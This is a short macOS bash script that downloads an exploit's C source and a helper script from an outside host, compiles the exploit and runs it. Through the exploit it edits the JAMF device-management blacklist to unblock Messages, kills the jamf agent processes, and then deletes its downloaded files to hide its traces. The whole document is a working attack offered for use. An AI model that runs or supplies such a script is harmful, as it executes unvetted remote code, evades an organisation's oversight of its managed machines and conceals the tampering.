#!/bin/bash

killall Messages

curl -Lo /tmp/exp.c boesen.science:2042/mac/exp.c
gcc /tmp/exp.c -o /tmp/a.out
curl -Lso /tmp/enact.sh boesen.science:2042/mac/enact.sh
chmod +x /tmp/enact.sh

/tmp/a.out <<EOF
/tmp/enact.sh &
sed -i -e 's/Messages/iMessage/g' /Library/Application\ Support/JAMF/.blacklist.xml
for i in {1..5}; do
    killall jamf jamfAgent
    sleep .3s
done
EOF

rm -f /tmp/*.sh /tmp/*.c /tmp/*.out
open /Applications/Messages.app

exit
